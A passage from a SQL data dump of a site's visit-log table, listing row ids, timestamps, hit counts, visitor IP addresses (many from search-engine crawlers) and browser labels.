0,'128.90.154.216','chrome'),(460368,1573238512,1,1,0,0,'46.211.147.86','chrome'),(460369,1573238700,1,1,0,0,'194.44.208.90','chrome'),(460370,1573240048,1,1,0,0,'141.8.142.161','other'),(460371,1573240437,1,1,0,0,'213.180.203.44','other'),(460372,1573240724,1,1,0,0,'8.29.198.26','other'),(460373,1573241046,1,1,0,0,'66.249.64.27','chrome'),(460374,1573241142,2,2,0,0,'157.55.39.209','other'),(460375,1573241192,1,1,0,0,'8.29.198.25','other'),(460376,1573241586,1,0,1,0,'66.249.64.26',''),(460377,1573242527,1,1,0,0,'157.55.39.209','other'),(460378,1573242630,1,1,0,0,'195.10.210.49','chrome'),(460379,1573242681,1,1,0,0,'213.180.203.44','other'),(460380,1573242929,1,1,0,0,'157.55.39.130','other'),(460381,1573243123,1,1,0,0,'66.249.64.28','chrome'),(460382,1573243691,1,1,0,0,'141.8.142.2','other'),(460383,1573243743,1,1,0,0,'207.46.13.181','other'),(460384,1573243907,1,1,0,0,'34.231.21.123','other'),(460385,1573244877,2,2,0,0,'213.180.203.44','other'),(460386,1573246792,1,1,0,0,'207.46.13.194','other'),(460387,1573247036,2,2,0,0,'37.9.113.10','other'),(460388,1573247080,1,1,0,0,'213.180.203.44','other'),(460389,1573247331,1,1,0,0,'207.46.13.181','other'),(460390,1573250837,1,1,0,0,'207.46.13.181','other'),(460391,1573251582,2,2,0,0,'8.29.198.27','other'),(460392,1573251664,1,1,0,0,'213.180.203.44','other'),(460393,1573251932,1,1,0,0,'66.249.70.36','chrome'),(460394,1573252332,1,1,0,0,'66.249.70.62','chrome'),(460395,1573252604,3,3,0,0,'66.249.64.28','chrome'),(460396,1573252618,1,1,0,0,'66.249.64.27','chrome'),(460397,1573252774,2,2,0,0,'213.180.203.44','other'),(460398,1573254783,1,1,0,0,'213.180.203.44','other'),(460399,1573256310,1,1,0,0,'213.180.203.37','other'),(460400,1573256653,1,1,0,0,'66.249.64.28','chrome'),(460401,1573256685,2,2,0,0,'66.249.64.26','chrome'),(460402,1573257531,1,1,0,0,'213.180.203.44','other'),(460403,1573258710,1,1,0,0,'213.180.203.37','other'),(460404,1573258750,1,1,0,0,'141.8.142.2','other'),(460405,1573258778,1,1,0,0,'207.46.13.181','other'),(460406,1573258785,1,1,0,0,'213.180.203.44','other'),(460407,1573260372,1,0,1,0,'66.249.64.27',''),(460408,1573260914,1,1,0,0,'62.205.134.182','other'),(460409,1573261122,1,1,0,0,'13.57.177.178','chrome'),(460410,1573261587,1,1,0,0,'66.249.70.62','chrome'),(460411,1573261606,1,1,0,0,'66.249.64.27','chrome'),(460412,1573261727,4,4,0,0,'66.249.64.28','chrome'),(460413,1573262350,1,1,0,0,'66.249.70.33','chrome'),(460414,1573262439,2,2,0,0,'8.29.198.25','other'),(460415,1573262692,1,1,0,0,'46.243.220.24','chrome'),(460416,1573263857,3,3,0,0,'66.249.64.27','chrome'),(460417,1573264278,1,1,0,0,'213.180.203.44','other'),(460418,1573264651,1,1,0,0,'66.249.64.28','chrome'),(460419,1573265376,1,1,0,0,'178.154.200.71','other'),(460420,1573265396,2,2,0,0,'213.180.203.37','other'),(460421,1573267815,1,1,0,0,'207.46.13.194','other'),(460422,1573268658,1,1,0,0,'66.249.64.28','chrome'),(460423,1573270342,2,2,0,0,'157.55.39.137','other'),(460424,1573270444,1,1,0,0,'213.180.203.44','other'),(460425,1573271226,1,1,0,0,'193.106.30.99','chrome'),(460426,1573271294,1,1,0,0,'31.13.115.39','other'),(460427,1573271295,1,1,0,0,'31.13.115.25','other'),(460428,1573271728,1,1,0,0,'66.249.64.28','chrome'),(460429,1573271735,1,1,0,0,'66.249.64.27','chrome'),(460430,1573273305,2,2,0,0,'8.29.198.27','other'),(460431,1573274594,1,1,0,0,'66.249.64.28','chrome'),(460432,1573275058,2,2,0,0,'213.180.203.44','other'),(460433,1573276662,1,1,0,0,'66.249.64.26','chrome'),(460434,1573277191,1,1,0,0,'66.249.64.27','chrome'),(460435,1573277971,1,1,0,0,'193.106.30.99','chrome'),(460436,1573278168,1,1,0,0,'62.205.134.182','other'),(460437,1573278324,1,1,0,0,'207.46.13.194','other'),(460438,1573278675,1,1,0,0,'213.180.203.44','other'),(460439,1573278677,1,1,0,0,'66.249.64.26','chrome'),(460440,1573279382,1,1,0,0,'66.249.64.27','chrome'),(460441,1573280776,1,1,0,0,'5.45.207.65','other'),(460442,1573280811,1,1,0,0,'66.249.64.27','chrome'),(460443,1573280855,1,1,0,0,'37.9.113.33','other'),(460444,1573281038,1,1,0,0,'66.249.64.28','chrome'),(460445,1573281926,1,1,0,0,'46.211.49.238','other'),(460446,1573282224,1,1,0,0,'207.46.13.194','other'),(460447,1573283060,1,1,0,0,'37.9.113.10','other'),(460448,1573283340,1,1,0,0,'207.46.13.194','other'),(460449,1573284158,1,1,0,0,'8.29.198.25','other'),(460450,1573284631,1,1,0,0,'8.29.198.27','other'),(460451,1573285177,1,1,0,0,'178.154.200.33','other'),(460452,1573285269,1,1,0,0,'66.249.64.27','chrome'),(460453,1573285334,1,1,0,0,'213.180.203.44','other'),(460454,1573286180,2,2,0,0,'167.99.212.214','chrome'),(460455,1573286297,1,1,0,0,'66.249.64.28','chrome'),(460456,1573286353,1,1,0,0,'213.180.203.44','other'),(460457,1573287561,1,1,0,0,'46.211.241.196','chrome'),(460458,1573287635,1,1,0,0,'213.180.203.44','other'),(460459,1573287687,2,2,0,0,'207.46.13.217','other'),(460460,1573287691,1,1,0,0,'207.46.13.194','other'),(460461,1573287696,1,1,0,0,'207.46.13.128','other'),(460462,1573288322,1,1,0,0,'66.249.64.27','chrome'),(460463,1573288588,3,2,1,0,'66.249.64.28',''),(460464,1573288696,1,1,0,0,'141.8.142.2','other'),(460465,1573288943,1,1,0,0,'213.180.203.44','other'),(460466,1573288990,1,1,0,0,'207.46.13.194','other'),(460467,1573290666,1,1,0,0,'66.249.64.27','chrome'),(460468,1573291392,1,1,0,0,'66.249.64.28','chrome'),(460469,1573291522,2,2,0,0,'212.90.45.139','firefox'),(460470,1573291736,1,1,0,0,'207.46.13.194','other'),(460471,1573291989,1,1,0,0,'213.180.203.44','other'),(460472,1573293055,1,1,0,0,'213.180.203.44','other'),(460473,1573293354,1,1,0,0,'66.249.64.26','chrome'),(460474,1573294157,1,1,0,0,'18.144.69.220','chrome'),(460475,1573294163,9,9,0,0,'13.56.16.122','chrome'),(460476,1573294164,1,1,0,0,'54.183.122.21','chrome'),(460477,1573294206,2,2,0,0,'213.180.203.44','other'),(460478,1573294236,1,1,0,0,'87.250.224.90','other'),(460479,1573294815,1,1,0,0,'207.46.13.217','other'),(460480,1573294975,1,1,0,0,'207.46.13.194','other'),(460481,1573295004,2,2,0,0,'8.29.198.27','other'),(460482,1573295441,2,2,0,0,'66.249.64.28','chrome'),(460483,1573296816,1,1,0,0,'66.249.64.27','chrome'),(460484,1573296844,2,2,0,0,'207.46.13.194','other'),(460485,1573298406,1,1,0,0,'193.106.30.99','firefox'),(460486,1573300596,2,2,0,0,'207.46.13.194','other'),(460487,1573300669,1,1,0,0,'66.249.64.28','chrome'),(460488,1573301857,2,2,0,0,'213.180.203.44','other'),(460489,1573302765,1,1,0,0,'91.196.178.189','chrome'),(460490,1573302819,1,1,0,0,'66.249.64.28','chrome'),(460491,1573302943,2,2,0,0,'91.209.11.236','other'),(460492,1573303938,2,2,0,0,'91.209.11.236','other'),(460493,1573304079,1,1,0,0,'213.180.203.44','other'),(460494,1573304882,2,2,0,0,'207.46.13.194','other'),(460495,1573305038,1,1,0,0,'91.209.11.236','other'),(460496,1573305187,3,3,0,0,'213.180.203.44','other'),(460497,1573305826,1,1,0,0,'109.74.154.72','chrome'),(460498,1573305853,1,1,0,0,'8.29.198.25','other'),(460499,1573305903,1,1,0,0,'207.46.13.217','other'),(460500,1573306217,1,1,0,0,'37.73.136.125','chrome'),(460501,1573306343,1,1,0,0,'8.29.198.27','other'),(460502,1573307641,1,1,0,0,'2.95.74.118','chrome'),(460503,1573307883,2,2,0,0,'66.249.64.27','chrome'),(460504,1573307916,1,1,0,0,'66.249.70.33','chrome'),(460505,1573308204,1,1,0,0,'66.249.64.28','chrome'),(460506,1573312097,1,1,0,0,'213.180.203.44','other'),(460507,1573312104,1,1,0,0,'37.9.113.163','other'),(460508,1573312642,3,3,0,0,'104.154.208.58','chrome'),(460509,1573312654,3,3,0,0,'34.67.85.190','chrome'),(460510,1573312665,3,3,0,0,'104.198.57.20','chrome'),(460511,1573312678,2,2,0,0,'35.225.189.178','chrome'),(460512,1573314319,2,2,0,0,'213.180.203.37','other'),(460513,1573314602,2,2,0,0,'66.249.64.26','chrome'),(460514,1573314894,2,2,0,0,'207.46.13.217','other'),(460515,1573315265,1,1,0,0,'213.180.203.44','other'),(460516,1573315575,1,1,0,0,'66.249.70.33','chrome'),(460517,1573316453,1,1,0,0,'66.249.64.26','chrome'),(460518,1573316710,1,1,0,0,'8.29.198.25','other'),(460519,1573316902,1,1,0,0,'207.46.13.11','other'),(460520,1573316968,1,1,0,0,'66.249.64.27','chrome'),(460521,1573317211,1,1,0,0,'8.29.198.26','other'),(460522,1573318451,1,1,0,0,'66.249.64.28','chrome'),(460523,1573319850,1,1,0,0,'31.13.127.14','other'),(460524,1573319851,1,1,0,0,'31.13.127.4','other'),(460525,1573320410,2,0,2,0,'207.46.13.205',''),(460526,1573321386,1,1,0,0,'54.36.149.23','other'),(460527,1573321393,1,1,0,0,'207.46.13.205','other'),(460528,1573322056,1,1,0,0,'54.36.149.3','other'),(460529,1573322503,2,2,0,0,'66.249.64.27','chrome'),(460530,1573322635,1,1,0,0,'54.36.149.59','other'),(460531,1573322701,1,1,0,0,'213.180.203.37','other'),(460532,1573323628,1,1,0,0,'54.36.149.15','other'),(460533,1573323928,1,1,0,0,'176.119.97.193','chrome'),(460534,1573324372,1,1,0,0,'66.249.64.28','chrome'),(460535,1573324888,1,1,0,0,'66.249.64.27','chrome'),(460536,1573324906,1,1,0,0,'66.249.70.62','chrome'),(460537,1573325548,1,1,0,0,'207.46.13.75','other'),(460538,1573326404,2,2,0,0,'157.55.39.236','other'),(460539,1573326521,1,1,0,0,'66.249.70.33','chrome'),(460540,1573326560,1,1,0,0,'66.249.64.26','chrome'),(460541,1573326646,1,1,0,0,'54.36.149.19','other'),(460542,1573327183,1,1,0,0,'54.36.149.70','other'),(460543,1573327385,1,1,0,0,'54.36.149.16','other'),(460544,1573327566,1,1,0,0,'8.29.198.27','other'),(460545,1573327902,1,1,0,0,'66.249.64.26','chrome'),(460546,1573328060,1,1,0,0,'8.29.198.26','other'),(460547,1573328074,1,1,0,0,'66.249.70.33','chrome'),(460548,1573328415,1,1,0,0,'207.46.13.75','other'),(460549,1573331916,1,1,0,0,'213.180.203.44','other'),(460550,1573332349,1,1,0,0,'207.46.13.11','other'),(460551,1573334231,1,1,0,0,'213.180.203.44','other'),(460552,1573334431,1,1,0,0,'54.36.149.60','other'),(460553,1573334491,1,1,0,0,'54.36.149.103','other'),(460554,1573334518,1,1,0,0,'176.119.97.193','chrome'),(460555,1573335255,1,1,0,0,'141.8.142.2','other'),(460556,1573336556,1,1,0,0,'54.36.149.17','other'),(460557,1573336703,1,1,0,0,'54.36.149.88','other'),(460558,1573337517,1,1,0,0,'141.8.142.2','other'),(460559,1573337660,1,1,0,0,'207.46.13.205','other'),(460560,1573338421,1,1,0,0,'8.29.198.25','other'),(460561,1573338519,1,1,0,0,'54.36.149.67','other'),(460562,1573338673,1,1,0,0,'66.249.70.33','chrome'),(460563,1573338833,1,1,0,0,'54.36.149.22','other'),(460564,1573338899,1,1,0,0,'8.29.198.27','other'),(460565,1573339223,1,1,0,0,'91.196.178.18','chrome'),(460566,1573339675,257,257,0,0,'148.251.10.183','other'),(460567,1573339801,2,2,0,0,'213.180.203.44','other'),(460568,1573339836,1,1,0,0,'213.180.203.37','other'),(460569,1573339892,1,1,0,0,'66.249.70.36','chrome'),(460570,1573340212,1,1,0,0,'141.8.142.119','other'),(460571,1573340332,1,1,0,0,'66.249.64.28','chrome'),(460572,1573340990,1,1,0,0,'207.46.13.205','other'),(460573,1573342058,1,1,0,0,'54.36.149.43','other'),(460574,1573342349,2,2,0,0,'213.180.203.44','other'),(460575,1573343203,1,1,0,0,'207.46.13.205','other'),(460576,1573343434,159,159,0,0,'173.208.130.202','other'),(460577,1573343537,1,1,0,0,'66.249.64.26','chrome'),(460578,1573343893,1,1,0,0,'213.180.203.44','other'),(460579,1573344338,76,76,0,0,'173.208.130.202','other'),(460580,1573344732,42,42,0,0,'5.189.178.48','other'),(460581,1573345646,15,15,0,0,'5.189.178.48','other'),(460582,1573346218,1,0,1,0,'66.249.64.27',''),(460583,1573346786,1,1,0,0,'54.36.149.64','other'),(460584,1573346902,1,1,0,0,'54.36.149.56','other'),(460585,1573347219,1,1,0,0,'66.249.64.28','chrome'),(460586,1573347251,1,1,0,0,'54.36.149.60','other'),(460587,1573347314,1,1,0,0,'62.205.134.182','other'),(460588,1573347474,1,1,0,0,'213.180.203.44','other'),(460589,1573348221,2,2,0,0,'207.46.13.75','other'),(460590,1573348591,1,1,0,0,'213.180.203.37','other'),(460591,1573349092,1,1,0,0,'157.55.39.236','other'),(460592,1573349264,2,2,0,0,'8.29.198.25','other'),(460593,1573349692,1,1,0,0,'213.180.203.37','other'),(460594,1573349730,1,1,0,0,'141.8.142.2','other'),(460595,1573349759,1,1,0,0,'213.180.203.44','other'),(460596,1573349851,1,1,0,0,'54.36.149.86','other'),(460597,1573350188,1,1,0,0,'207.46.13.205','other'),(460598,1573352070,1,1,0,0,'87.250.224.90','other'),(460599,1573352139,1,1,0,0,'213.180.203.44','other'),(460600,1573352643,1,1,0,0,'54.36.149.102','other'),(460601,1573353839,1,1,0,0,'54.36.149.94','other'),(460602,1573354316,1,1,0,0,'213.180.203.44','other'),(460603,1573354663,1,1,0,0,'178.154.200.33','other'),(460604,1573355198,1,1,0,0,'66.249.64.27','chrome'),(460605,1573355932,1,1,0,0,'54.36.149.57','other'),(460606,1573356263,1,1,0,0,'54.36.149.3','other'),(460607,1573356772,1,1,0,0,'66.249.64.27','chrome'),(460608,1573357618,1,1,0,0,'54.36.149.42','other'),(460609,1573357619,1,1,0,0,'213.180.203.44','other'),(460610,1573360104,1,1,0,0,'8.29.198.25','other'),(460611,1573360188,1,1,0,0,'54.36.149.3','other'),(460612,1573360214,1,1,0,0,'66.249.64.27','chrome'),(460613,1573360586,1,1,0,0,'8.29.198.26','other'),(460614,1573361025,1,1,0,0,'54.36.149.106','other'),(460615,1573361028,2,2,0,0,'213.180.203.44','other'),(460616,1573361150,1,1,0,0,'91.196.178.54','chrome'),(460617,1573361472,2,2,0,0,'66.249.64.28','chrome'),(460618,1573361526,1,1,0,0,'54.36.149.41','other'),(460619,1573361558,1,1,0,0,'54.36.149.48','other'),(460620,1573362084,1,1,0,0,'213.180.203.44','other'),(460621,1573362292,1,1,0,0,'207.46.13.150','other'),(460622,1573363200,1,1,0,0,'213.180.203.44','other'),(460623,1573363220,1,1,0,0,'141.8.142.2','other'),(460624,1573364570,2,0,2,0,'207.46.13.18',''),(460625,1573364765,1,1,0,0,'62.205.134.182','other'),(460626,1573364887,3,3,0,0,'207.46.13.20','other'),(460627,1573365621,1,1,0,0,'66.249.64.26','chrome'),(460628,1573366799,1,1,0,0,'213.180.203.37','other'),(460629,1573367470,1,1,0,0,'66.249.64.27','chrome'),(460630,1573367889,3,3,0,0,'213.180.203.44','other'),(460631,1573369017,2,2,0,0,'66.249.64.27','chrome'),(460632,1573370140,1,1,0,0,'66.249.64.27','chrome'),(460633,1573370944,1,1,0,0,'8.29.198.27','other'),(460634,1573371089,1,1,0,0,'66.249.64.26','chrome'),(460635,1573371323,1,1,0,0,'213.180.203.44','other'),(460636,1573371437,1,1,0,0,'8.29.198.25','other'),(460637,1573374188,1,1,0,0,'207.46.13.20','other'),(460638,1573374193,1,1,0,0,'207.46.13.18','other'),(460639,1573374198,1,1,0,0,'207.46.13.150','other'),(460640,1573374810,1,1,0,0,'31.13.127.21','other'),(460641,1573374811,1,1,0,0,'31.13.127.15','other'),(460642,1573375518,1,1,0,0,'207.46.13.20','other'),(460643,1573375890,1,1,0,0,'207.46.13.18','other'),(460644,1573377600,1,1,0,0,'66.249.64.28','chrome'),(460645,1573379955,1,1,0,0,'207.46.13.18','other'),(460646,1573381777,1,1,0,0,'8.29.198.25','other'),(460647,1573381868,1,1,0,0,'213.180.203.37','other'),(460648,1573382285,1,1,0,0,'8.29.198.26','other'),(460649,1573383659,1,1,0,0,'193.106.30.99','chrome'),(460650,1573385324,1,1,0,0,'141.8.142.2','other'),(460651,1573385339,1,1,0,0,'213.180.203.44','other'),(460652,1573387411,1,1,0,0,'207.46.13.20','other'),(460653,1573388310,1,1,0,0,'46.211.155.81','chrome'),(460654,1573388901,1,1,0,0,'109.74.154.72','chrome'),(460655,1573390277,1,1,0,0,'66.249.64.27','chrome'),(460656,1573391336,1,1,0,0,'91.196.178.130','firefox'),(460657,1573391433,1,1,0,0,'141.8.142.50','other'),(460658,1573391480,1,1,0,0,'37.9.113.33','other'),(460659,1573392625,1,1,0,0,'8.29.198.26','other'),(460660,1573393125,1,1,0,0,'8.29.198.27','other'),(460661,1573394091,1,1,0,0,'141.8.142.164','other'),(460662,1573394485,1,1,0,0,'91.196.178.189','chrome'),(460663,1573396218,1,1,0,0,'141.8.142.2','other'),(460664,1573398423,2,2,0,0,'207.46.13.20','other'),(460665,1573398521,1,1,0,0,'66.249.64.28','chrome'),(460666,1573398786,1,1,0,0,'213.180.203.44','other'),(460667,1573399037,1,1,0,0,'31.13.127.18','other'),(460668,1573399038,1,1,0,0,'31.13.127.13','other'),(460669,1573400186,1,1,0,0,'95.24.6.168','msie'),(460670,1573400475,1,1,0,0,'46.211.154.65','chrome'),(460671,1573400860,2,1,1,0,'207.46.13.20',''),(460672,1573401148,1,1,0,0,'66.249.64.28','chrome'),(460673,1573403471,1,1,0,0,'8.29.198.25','other'),(460674,1573403975,1,1,0,0,'8.29.198.27','other'),(460675,1573405129,1,1,0,0,'213.180.203.44','other'),(460676,1573405438,1,1,0,0,'2.95.74.132','chrome'),(460677,1573406192,1,1,0,0,'213.180.203.37','other'),(460678,1573406274,2,2,0,0,'185.185.217.74','other'),(460679,1573407512,2,2,0,0,'213.180.203.44','other'),(460680,1573407633,1,1,0,0,'213.180.203.37','other'),(460681,1573407945,1,1,0,0,'66.249.64.26','chrome'),(460682,1573408814,1,1,0,0,'95.108.213.55','other'),(460683,1573413064,1,1,0,0,'157.55.39.175','other'),(460684,1573413952,1,1,0,0,'66.249.64.27','chrome'),(460685,1573414284,1,1,0,0,'91.196.178.101','chrome'),(460686,1573414326,1,1,0,0,'8.29.198.25','other'),(460687,1573414558,2,2,0,0,'60.191.38.77','firefox'),(460688,1573414820,1,1,0,0,'8.29.198.27','other'),(460689,1573416606,1,1,0,0,'178.92.250.218','chrome'),(460690,1573417590,2,2,0,0,'60.191.38.77','firefox'),(460691,1573417817,1,1,0,0,'13.66.139.0','other'),(460692,1573418188,1,1,0,0,'66.249.70.62','chrome'),(460693,1573421917,1,1,0,0,'37.9.113.163','other'),(460694,1573421962,3,3,0,0,'66.249.64.26','chrome'),(460695,1573423253,1,1,0,0,'213.180.203.44','other'),(460696,1573424894,5,5,0,0,'157.55.39.112','other'),(460697,1573424999,1,1,0,0,'157.55.39.175','other'),(460698,1573425159,1,1,0,0,'8.29.198.27','other'),(460699,1573425660,1,1,0,0,'8.29.198.25','other'),(460700,1573426594,1,1,0,0,'213.180.203.44','other'),(460701,1573429350,1,1,0,0,'157.55.39.112','other'),(460702,1573429450,1,1,0,0,'207.46.13.195','other'),(460703,1573429944,2,0,2,0,'157.55.39.175',''),(460704,1573429982,1,1,0,0,'66.249.64.26','chrome'),(460705,1573430517,1,1,0,0,'157.55.39.175','other'),(460706,1573432516,1,1,0,0,'66.249.64.28','chrome'),(460707,1573432519,2,1,1,0,'66.249.64.26',''),(460708,1573433714,1,1,0,0,'62.205.134.182','other'),(460709,1573434187,1,1,0,0,'213.180.203.37','other'),(460710,1573435459,1,1,0,0,'207.46.13.195','other'),(460711,1573435998,1,1,0,0,'8.29.198.25','other'),(460712,1573436360,1,1,0,0,'87.250.224.90','other'),(460713,1573436499,1,1,0,0,'8.29.198.26','other'),(460714,1573437895,1,1,0,0,'213.180.203.44','other'),(460715,1573437953,1,1,0,0,'66.249.64.27','chrome'),(460716,1573440027,2,2,0,0,'34.231.21.222','other'),(460717,1573441972,1,1,0,0,'66.249.64.26','chrome'),(460718,1573444360,1,1,0,0,'157.55.39.112','other'),(460719,1573445645,2,2,0,0,'157.55.39.112','other'),(460720,1573446739,1,1,0,0,'213.180.203.44','other'),(460721,1573446832,1,1,0,0,'8.29.198.25','other'),(460722,1573447351,1,1,0,0,'8.29.198.27','other'),(460723,1573449364,1,1,0,0,'157.55.39.175','other'),(460724,1573450182,1,1,0,0,'141.8.188.12','other'),(460725,1573451009,1,0,1,0,'207.46.13.195',''),(460726,1573451035,1,1,0,0,'62.205.134.182','other'),(460727,1573453309,1,1,0,0,'66.249.64.27','chrome'),(460728,1573454962,1,1,0,0,'213.180.203.37','other'),(460729,1573454985,1,1,0,0,'87.250.224.90','other'),(460730,1573455199,1,1,0,0,'157.55.39.136','other'),(460731,1573456855,1,1,0,0,'66.249.64.26','chrome'),(460732,1573457069,1,1,0,0,'157.55.39.101','other'),(460733,1573457242,1,1,0,0,'207.46.13.195','other'),(460734,1573457428,1,1,0,0,'213.180.203.44','other'),(460735,1573457663,1,1,0,0,'8.29.198.26','other'),(460736,1573457718,1,1,0,0,'91.196.178.84','chrome'),(460737,1573458143,1,1,0,0,'157.55.39.101','other'),(460738,1573458199,1,1,0,0,'8.29.198.25','other'),(460739,1573458544,1,1,0,0,'213.180.203.37','other'),(460740,1573460044,1,1,0,0,'213.180.203.37','other'),(460741,1573461059,2,2,0,0,'207.46.13.195','other'),(460742,1573461210,1,1,0,0,'77.111.244.75','chrome'),(460743,1573461353,1,1,0,0,'213.180.203.44','other'),(460744,1573461433,1,1,0,0,'91.196.178.84','chrome'),(460745,1573462602,1,1,0,0,'91.196.177.46','chrome'),(460746,1573462639,1,1,0,0,'77.111.244.78','chrome'),(460747,1573463649,1,1,0,0,'62.80.163.45','chrome'),(460748,1573463695,1,1,0,0,'91.196.178.175','chrome'),(460749,1573464478,1,1,0,0,'213.180.203.37','other'),(460750,1573464753,1,1,0,0,'157.55.39.136','other'),(460751,1573465334,1,1,0,0,'66.249.64.27','chrome'),(460752,1573466043,1,1,0,0,'213.180.203.44','other'),(460753,1573466847,1,1,0,0,'66.249.64.27','chrome'),(460754,1573466857,1,1,0,0,'66.249.93.216','chrome'),(460755,1573466858,1,1,0,0,'66.249.64.26','chrome'),(460756,1573467365,1,1,0,0,'213.180.203.44','other'),(460757,1573467960,1,1,0,0,'157.55.39.136','other'),(460758,1573468003,1,1,0,0,'18.213.220.5','chrome'),(460759,1573468493,2,2,0,0,'8.29.198.26','other'),(460760,1573468886,1,1,0,0,'157.55.39.101','other'),(460761,1573468937,1,1,0,0,'77.222.143.222','opera'),(460762,1573469848,1,1,0,0,'213.180.203.44','other'),(460763,1573472186,1,1,0,0,'213.180.203.44','other'),(460764,1573472541,1,1,0,0,'31.13.127.10','other'),(460765,1573472542,2,2,0,0,'31.13.127.11','other'),(460766,1573472543,1,1,0,0,'31.13.127.16','other'),(460767,1573473218,1,1,0,0,'195.123.10.42','chrome'),(460768,1573474571,1,1,0,0,'141.8.142.2','other'),(460769,1573475839,1,1,0,0,'91.196.178.98','chrome'),(460770,1573476191,1,1,0,0,'51.75.104.169','msie'),(460771,1573477013,1,1,0,0,'157.55.39.136','other'),(460772,1573477018,1,1,0,0,'213.180.203.44','other'),(460773,1573477063,1,1,0,0,'207.46.13.195','other'),(460774,1573479340,1,1,0,0,'8.29.198.27','other'),(460775,1573479885,1,1,0,0,'8.29.198.26','other'),(460776,1573479984,1,1,0,0,'91.196.178.90','firefox'),(460777,1573481579,1,1,0,0,'207.46.13.203','other'),(460778,1573481839,1,1,0,0,'109.74.154.72','chrome'),(460779,1573483694,1,1,0,0,'213.180.203.44','other'),(460780,1573484479,2,0,2,0,'207.46.13.195',''),(460781,1573488056,1,1,0,0,'157.55.39.136','other'),(460782,1573490200,2,2,0,0,'8.29.198.27','other'),(460783,1573490367,1,1,0,0,'66.249.64.28','chrome'),(460784,1573491124,1,1,0,0,'91.196.178.83','firefox'),(460785,1573491282,1,0,1,0,'66.249.64.26',''),(460786,1573491951,14,14,0,0,'35.239.115.127','firefox'),(460787,1573491964,1,1,0,0,'207.46.13.195','other'),(460788,1573492263,1,1,0,0,'141.8.183.15','other'),(460789,1573492373,1,1,0,0,'213.180.203.37','other'),(460790,1573493095,1,1,0,0,'195.43.71.195','chrome'),(460791,1573493242,1,1,0,0,'213.180.203.44','other'),(460792,1573493640,1,1,0,0,'46.211.218.45','chrome'),(460793,1573494857,1,1,0,0,'213.180.203.44','other'),(460794,1573495945,1,1,0,0,'46.211.132.227','chrome'),(460795,1573496513,2,2,0,0,'66.249.64.27','chrome'),(460796,1573496756,1,1,0,0,'31.13.127.27','other'),(460797,1573496758,1,1,0,0,'31.13.127.15','other'),(460798,1573496954,1,1,0,0,'46.211.132.227','chrome'),(460799,1573497468,1,1,0,0,'17.58.101.255','other'),(460800,1573498033,1,1,0,0,'66.249.64.28','chrome'),(460801,1573498598,1,1,0,0,'178.154.200.60','other'),(460802,1573499417,1,1,0,0,'178.74.214.94','chrome'),(460803,1573499727,1,1,0,0,'213.180.203.44','other'),(460804,1573501056,1,1,0,0,'8.29.198.27','other'),(460805,1573501263,1,1,0,0,'141.8.132.37','other'),(460806,1573501408,1,1,0,0,'66.249.64.27','chrome'),(460807,1573501586,1,1,0,0,'8.29.198.26','other'),(460808,1573501848,1,1,0,0,'157.55.39.136','other'),(460809,1573501997,1,1,0,0,'178.154.200.71','other'),(460810,1573503212,1,0,1,0,'66.249.70.62',''),(460811,1573503311,1,1,0,0,'213.180.203.37','other'),(460812,1573503330,2,2,0,0,'95.213.141.126','opera'),(460813,1573504373,1,1,0,0,'213.180.203.44','other'),(460814,1573504397,1,1,0,0,'46.119.158.154','chrome'),(460815,1573507708,1,1,0,0,'87.250.224.90','other'),(460816,1573507747,1,1,0,0,'213.180.203.37','other'),(460817,1573509371,1,1,0,0,'91.209.11.236','other'),(460818,1573511667,1,1,0,0,'213.180.203.44','other'),(460819,1573511893,2,2,0,0,'8.29.198.27','other'),(460820,1573512346,1,1,0,0,'207.46.13.38','other'),(460821,1573512465,1,1,0,0,'95.108.213.55','other'),(460822,1573512725,1,1,0,0,'141.8.142.2','other'),(460823,1573513586,1,1,0,0,'207.46.13.38','other'),(460824,1573514594,1,1,0,0,'209.17.96.18','other'),(460825,1573515120,1,1,0,0,'213.180.203.44','other'),(460826,1573515910,1,1,0,0,'209.17.96.50','other'),(460827,1573517052,2,2,0,0,'66.249.64.26','chrome'),(460828,1573517809,1,1,0,0,'66.249.64.27','chrome'),(460829,1573520622,1,1,0,0,'213.180.203.44','other'),(460830,1573522219,1,1,0,0,'54.184.30.66','other'),(460831,1573522727,1,1,0,0,'8.29.198.26','other'),(460832,1573523131,1,1,0,0,'38.135.104.10','chrome'),(460833,1573523269,1,1,0,0,'8.29.198.27','other'),(460834,1573523472,1,1,0,0,'66.249.70.62','chrome'),(460835,1573523877,2,2,0,0,'66.249.64.28','chrome'),(460836,1573524264,1,1,0,0,'66.249.64.26','chrome'),(460837,1573525454,1,0,1,0,'66.249.64.26',''),(460838,1573525975,1,1,0,0,'213.180.203.44','other'),(460839,1573526191,1,1,0,0,'66.249.64.26','chrome'),(460840,1573528377,1,1,0,0,'66.249.64.28','chrome'),(460841,1573528458,1,1,0,0,'66.249.64.27','chrome'),(460842,1573529525,1,1,0,0,'66.249.64.26','chrome'),(460843,1573529544,1,1,0,0,'213.180.203.44','other'),(460844,1573530293,1,1,0,0,'66.249.64.27','chrome'),(460845,1573532318,1,1,0,0,'157.55.39.136','other'),(460846,1573533103,2,2,0,0,'213.180.203.44','other'),(460847,1573533220,1,1,0,0,'66.249.64.27','chrome'),(460848,1573533561,1,1,0,0,'8.29.198.26','other'),(460849,1573534044,1,1,0,0,'66.249.64.26','chrome'),(460850,1573534105,1,1,0,0,'8.29.198.25','other'),(460851,1573534205,1,1,0,0,'213.180.203.44','other'),(460852,1573535370,1,1,0,0,'213.180.203.44','other'),(460853,1573535556,1,1,0,0,'213.180.203.37','other'),(460854,1573537829,1,1,0,0,'66.249.64.27','chrome'),(460855,1573539181,1,1,0,0,'66.249.64.27','chrome'),(460856,1573540347,1,1,0,0,'141.8.142.2','other'),(460857,1573541088,1,1,0,0,'66.249.64.26','chrome'),(460858,1573542741,1,1,0,0,'213.180.203.44','other'),(460859,1573542776,1,1,0,0,'66.249.64.26','chrome'),(460860,1573543584,1,1,0,0,'91.124.239.162','chrome'),(460861,1573543884,1,1,0,0,'46.219.205.154','chrome'),(460862,1573543924,1,1,0,0,'66.249.64.28','chrome'),(460863,1573544212,2,2,0,0,'66.249.64.27','chrome'),(460864,1573544392,1,1,0,0,'8.29.198.25','other'),(460865,1573544932,1,1,0,0,'66.249.64.26','chrome'),(460866,1573544941,1,1,0,0,'8.29.198.27','other'),(460867,1573544963,1,1,0,0,'91.196.178.135','chrome'),(460868,1573545119,1,1,0,0,'91.196.177.46','chrome'),(460869,1573546017,1,1,0,0,'178.93.192.21','chrome'),(460870,1573546923,1,1,0,0,'178.92.171.147','chrome'),(460871,1573547363,2,2,0,0,'66.249.64.28','chrome'),(460872,1573548194,1,1,0,0,'157.55.39.136','other'),(460873,1573549644,